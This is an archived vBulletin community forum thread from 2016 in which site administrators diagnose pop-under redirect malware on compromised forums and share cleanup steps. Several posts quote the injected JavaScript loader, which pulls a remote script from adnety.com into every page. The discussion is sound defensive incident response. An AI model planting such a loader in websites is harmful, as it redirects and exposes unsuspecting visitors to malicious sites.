PDA

View Full Version : Pop Unders with false click..!


socialteenz
10-11-2016, 07:27 PM
So, basically i have been noticing many vb forums affected by this pop under malware..

What happens is, when you make a click on your site, the pop under appears and it redirects you to these sites..

adnety.com
clicknety.com
namefuze.com

Affected vBulletin Sites so far..

http://www.neogaf.com/forum/showthread.php?t=1229205&page=28 (https://www.vbulletin.com/link.php?u=http%3A%2F%2Fwww.neogaf.com%2Fforum%2Fs howthread.php%3Ft%3D1229205%26page%3D28)

http://www.tsptalk.com/mb/report-problems/26162-pop-ups-anyone-still-seeing-them.html? (https://www.vbulletin.com/link.php?u=http%3A%2F%2Fwww.tsptalk.com%2Fmb%2Frep ort-problems%2F26162-pop-ups-anyone-still-seeing-them.html%3Fs%3D9acbf7ebe10540390bc7657353a110f9)

http://www.contractortalk.com/f45/virus-pop-up-301393/ (https://www.vbulletin.com/link.php?u=http%3A%2F%2Fwww.contractortalk.com%2Ff 45%2Fvirus-pop-up-301393%2F)

https://forums.rajah.com/showthread.php?151343-Pop-ups


FIX:


Generally, we've found these have been caused by a rogue plugin installed under the 'vBulletin' product. Anyone else with this issue should check there in the first instance and delete it if there is one.

Best Practices...


1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

2) Check your plugins list for any that are not part of a product you've added:

AdminCP > Plugins & Products > Plugin Manager

Any listed under 'vBulletin' at the top of the list should be examined carefully and removed if you're unsure as to what they are.

3) Check your plugins for any base64 code. I recommend using against using any plugins or products that include base64 code in them. However some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

4) Update the following passwords in addition to your AdminCP:

- FTP
- Database

When updating the database password, ensure you also change your config.php file to use the new password otherwise your site won't be able to connect to the database.

5) Secure your AdminCP directory via .htaccess/.htpasswd.

Credits: Trevor Hannant

TheLastSuperman
10-11-2016, 07:33 PM
More than likely hidden in a file, called via referencing a url... could or could not be in base64 format i.e. encrypted per say from reading heck not sure, will know more once I run into this first-hand as with all this crud these terd-nuggets (hacker folks) come up with :p.

socialteenz
10-11-2016, 07:35 PM
Update:

The temporary fix to this issue is by disabling the plugin system.

define('DISABLE_HOOKS', true);

TheLastSuperman
10-11-2016, 07:40 PM
This code is at the top of two of your sites listed, I'd check for that on the site you have access to.

On one site:
<script type="text/javascript">
var win = [];
win['webid'] = '22357fb864e954c229';
win['traffic'] = '0';
win['raw'] = '2';
win['pop'] = '0';
(function() {
var pGTP = document.createElement('script'); pGTP.type = 'text/javascript'; pGTP.async = true;
var selectGtp = document.getElementsByTagName('script')[0];
pGTP.src = 'https://adnety.com/dashboard/call.js';
selectGtp.parentNode.insertBefore(pGTP, selectGtp);
})();
</script>

From a completely different site, similar code:
<script type="text/javascript">
var win = [];
win['webid'] = '78557fb86330ee36940';
win['traffic'] = '0';
win['raw'] = '2';
win['pop'] = '0';
(function() {
var pGTP = document.createElement('script'); pGTP.type = 'text/javascript'; pGTP.async = true;
var selectGtp = document.getElementsByTagName('script')[0];
pGTP.src = 'https://adnety.com/dashboard/call.js';
selectGtp.parentNode.insertBefore(pGTP, selectGtp);
})();
</script>

socialteenz
10-11-2016, 07:51 PM
The site which i have access is undergoing server update, i will get you the details once it's done.

This was the code found on their site..

<script type="text/javascript">
var win = [];
win['webid'] = '46157fb85796a03666';
win['traffic'] = '0';
win['raw'] = '2';
win['pop'] = '0';
(function() { var pGTP = document.createElement('script');
pGTP.type = 'text/javascript'; pGTP.async = true;
var selectGtp = document.getElementsByTagName('script')[0];
pGTP.src = 'https://adnety.com/dashboard/call.js';
selectGtp.parentNode.insertBefore(pGTP, selectGtp); })(); </script>

TheLastSuperman
10-11-2016, 07:53 PM
The site which i have access is undergoing server update, i will get you the details once it's done.

This was the code found on their site..

<script type="text/javascript"> var win = []; win['webid'] = '46157fb85796a03666'; win['traffic'] = '0'; win['raw'] = '2'; win['pop'] = '0'; (function() { var pGTP = document.createElement('script'); pGTP.type = 'text/javascript'; pGTP.async = true; var selectGtp = document.getElementsByTagName('script')[0]; pGTP.src = 'https://adnety.com/dashboard/call.js'; selectGtp.parentNode.insertBefore(pGTP, selectGtp); })(); </script>

Looks identical to the ones I also found, so look for how that was added or injected, what is in that area of the page on the back-end of the site? A Hook location or what? Trace it down that way ;). Also once removed check in a day or so and one solid week after to ensure it wasn't added again i.e. shell script left on the site OR code in a file that allows the code to be re-inserted etc etc.

While I find this interesting I'm terribly busy today so I may not be back to comment again for a few hours, catch up is my name at the moment (lol).

socialteenz
10-11-2016, 07:56 PM
Looks identical to the ones I also found, so look for how that was added or injected, what is in that area of the page on the back-end of the site? A Hook location or what? Trace it down that way ;). Also once removed check in a day or so and one solid week after to ensure it wasn't added again i.e. shell script left on the site OR code in a file that allows the code to be re-inserted etc etc.

While I find this interesting I'm terribly busy today so I may not be back to comment again for a few hours, catch up is my name at the moment (lol).

Sure, thanks for the info.

I am super sleepy as well, 3:25AM at my side of the world.

Trevor Hannant
10-12-2016, 08:21 AM
Generally, we've found these have been caused by a rogue plugin installed under the 'vBulletin' product. Anyone else with this issue should check there in the first instance and delete it if there is one.

socialteenz
10-12-2016, 06:57 PM
Generally, we've found these have been caused by a rogue plugin installed under the 'vBulletin' product. Anyone else with this issue should check there in the first instance and delete it if there is one.
Yup, right on.

Thanks.